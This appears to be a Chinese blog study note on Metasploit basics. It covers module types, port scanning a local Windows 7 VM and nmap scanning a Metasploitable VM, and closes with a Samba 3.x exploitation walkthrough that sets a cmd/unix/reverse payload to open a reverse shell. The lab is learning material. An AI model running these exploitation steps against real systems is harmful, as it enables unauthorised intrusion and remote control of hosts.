Metasploit学习笔记(一)
1.更新
apt-get update:更新源
apt-get upgrade:更新软件包
apt-get dist-upgrade:升级系统
2. Metasploit基础
2.1专业名词
Auxiliaries(辅助模块) 扫描,嗅探,指纹识别
Exploit(漏洞利用模块) 针对漏洞进行攻击
Payload:目标被渗透之后的完成实际攻击功能的代码如添加一个用户,关机等等
Post(后期渗透模块): 后渗透的一些攻击:获取敏感信息,实现天半攻击等
Encoders:免杀,混淆
2.2 渗透步骤
扫描目标主机,寻找漏洞
选择并配置一个Exploit
选择并配置一个Payload
选择一个Encoders
渗透攻击
3. 主机扫描
ip 开放端口,可用服务等
3.1 使用Auxiliary进行端口扫描
search portscan 搜索可用的扫描器
use 使用该模块,可以输入全名,也可以输入序号(选用tcp扫描器)
show options 显示需要设置的参数,required为yes的为必须包含的实际的值
RHOSTS:待扫描的ip PORTS:扫描端口范围 THREADS:扫描线程
set进行设置参数,unset取消参数的设置
以本地搭建好的一个win7虚拟机为例(ip 192.168.21.131)
run或exploit进行扫描
结果:25 110端口显示开放(1-1000)
别的扫描模块待测试,互联网上也有人列举出了一些常用的扫描模块
3.2 使用nmap扫描
msf下直接nmap
两次扫描均没什么结果
下面以 Metasploitable 虚拟机演示
安装: https://www.zhaosimeng.cn/ctcs/95.html
ip:192.168.21.132
4.0 漏洞利用
扫描信息 nmap -sV 192.168.21.132
目标主机上存在Samba3.x服务(对其进行攻击)
search samba
use 13 (13为excellent)
show payloads并选用一款Linux下的payload
set payload cmd/unix/reverse
show options
然后run/exploit(中间虚拟机出现了点问题ip变为192.168.21.133)
如图反弹一个shell
最新文章
- javascript --- 设计模式之构造函数模式
- SpringMVC+MyBatis+EasyUI 实现分页查询
- struts1老古董配置
- ML 01、机器学习概论
- Sublime Text 3 安装及简单配置
- Windows的免費hMailServer搭配SpamAssassin過濾垃圾郵件:安裝與設定
- Vs2010中水晶报表引用及打包
- Thrift入门
- LeetCode算法题-Base 7(Java实现)
- BZOJ 3687: 简单题 bitset
- @ControllerAdvice详解
- 01 of lenrning python
- linux的systemctl服务及其使用
- JavaScript基础知识(初识JS)
- day30
- LRN(local response normalization--局部响应标准化)
- Oracle数据库中的数据出错的解决办法
- karma + jasmine 构建前端自动化测试
- ios 获得通讯录中联系人的所有属性 亲测,可行 兼容io6 和 ios 7
- mod_pagespeed
热门文章
- Springboot使用自定义注解实现简单参数加密解密(注解+HandlerMethodArgumentResolver)
- pycharm工程包导入问题
- 在Centos7下搭建大数据环境,即Zookeeper+Hadoop+HBase
- Ubuntu查看文件格式(后缀名)
- spring中BeanPostProcessor之一:InstantiationAwareBeanPostProcessor(01)
- 使用Dism命令对Win7镜像进行操作
- webpack4.x 从零开始配置vue 项目(三)
- 原生的js操作实现通过对URL的监控获取参数
- Git应用详解第二讲:Git删除、修改、撤销操作
- 使用Azure Rest API获得Access Token介绍